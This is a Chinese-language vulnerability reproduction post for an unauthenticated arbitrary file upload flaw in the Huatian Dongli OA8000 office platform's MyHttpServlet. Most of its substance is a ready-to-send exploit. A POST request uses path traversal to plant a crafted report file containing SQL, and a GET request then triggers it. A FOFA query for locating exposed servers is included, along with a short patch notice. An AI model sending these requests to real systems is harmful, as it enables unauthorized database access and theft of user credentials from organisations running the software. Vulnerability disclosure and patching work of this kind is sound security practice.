华天动力-OA8000 MyHttpServlet 文件上传漏洞复现

0x01 产品简介

华天动力OA是一款将先进的管理思想、 管理模式和软件技术、网络技术相结合,为用户提供了低成本、 高效能的协同办公和管理平台。

0x02 漏洞概述

华天动力OA MyHttpServlet 存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。

0x03 影响范围

OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500

0x04 复现环境

FOFA:app="华天动力-OA8000"

0x05 漏洞复现

exp:

复制代码
POST /OAapp/MyHttpServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=9b0af0d79eaea67c3aa1889b0b43a50a
Accept-Encoding: gzip
Content-Length: 2428

--9b0af0d79eaea67c3aa1889b0b43a50a
Content-Disposition: form-data; name="file"; filename="\\Temp\\../../../report/reportFiles/d4f0fE.jpg"

{{unquote("RQQR\x00\x00\x01\xf5\x00\x00\x00\x02\x00\x02\x00\x00\x00\x1c\xa5A\x00\x00\x00\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\x1b\xb1B\x18ff\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\xac\xff\xff\xff\xff\xd0\xe1P\xff\x00\x00\x00?\x80\x00\x00\x10\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\"1\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xf8Dialog\x00\x0c\xff\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xffP?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00S?@\x00\x00\xff\x00\x00\x00\x00\x00\x00\x15\x00\x01\x28\x01\x00\x0f ds1.select\x28#1\x29\x00 \xc0\xff\xff\xff\xff\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\xff\xff\xff\xff\x00\x00\x00\x00\x00;\x00\x09\x00\x01\x00\x01\x00\x01\x00\x00\x00\x14\x00\x01\x00\x01\x00dCR\x00\x00C\x94\x80\x00A\x98\x00\x00A\x98\x00\x00A\xc8\x00\x00A\xc8\x00\x00\x01\x00\x00\x02\x00\x00\x02\x00\x02\x01\x01\x00\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00s\x00\x01\x01\xff\xff\xff\xd0com.runqian.report4.usermodel.SQLDataSetConfig\x00\x00\x00:\x00\x00\x00\x17\xff\xff\xff\xfbds1\xff\xff\xff\xfahtoa\xff\xff\xff\xfe\x00\x01\x00\x00\xff\xff\xff\xf1SELECT user\x28\x29\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x0a\x00\xff\xff\xff\xfe\x0b\x00\x00\x00\x00\x00\x00\x00\x12\xff\xff\xff\xfe\xff\xff\xff\xfe\x00\x00\x0f<\xff\xff\xff\xfe\x03\x01\x00\x00\x00d\x01\xff\xff\xff\xfe\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xfeRQQRRQQR\x1e\xf9\xb0\xac\xda\x8d\x80s\x83\xf4h\xc5\xc0#\xb4\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")}}
--9b0af0d79eaea67c3aa1889b0b43a50a--

PS:文件中的SQL语句是查询数据库当前用户

查看结果

复制代码
GET /report/reportJsp/showHTReport.jsp?reportFile=上传的文件名 HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x06 修复建议

目前厂商已发布安全补丁,请及时更新:http://www.oa8000.com

相关推荐
思通数科AI全行业智能NLP系统4 小时前
AI视频技术赋能幼儿园安全——教师离岗报警系统的智慧守护
大数据·人工智能·安全·目标检测·目标跟踪·自然语言处理·ocr
明似水5 小时前
Flutter 弹窗队列管理:支持优先级的线程安全通用弹窗队列系统
javascript·安全·flutter
CYRUS_STUDIO7 小时前
使用 Dex2C 加壳保护 Android APK 代码
android·安全·逆向
一颗星星辰7 小时前
路由交换网络专题 | 第八章 | GVRP配置 | 端口安全 | 端口隔离 | Mux-VLAN | Hybrid
网络·安全
自由鬼7 小时前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测
mon_star°10 小时前
搭建基于火灾风险预测与防范的消防安全科普小程序
安全·微信小程序·小程序·微信公众平台
神经毒素11 小时前
WEB安全--RCE--webshell bypass
网络·安全·web安全
程序猿chen14 小时前
量子跃迁:Vue组件安全工程的基因重组与生态免疫(完全体终局篇)
前端·vue.js·git·安全·面试·前端框架·跳槽
ALe要立志成为web糕手14 小时前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
w236173460114 小时前
Apache中间件解析漏洞与安全加固
安全·中间件·apache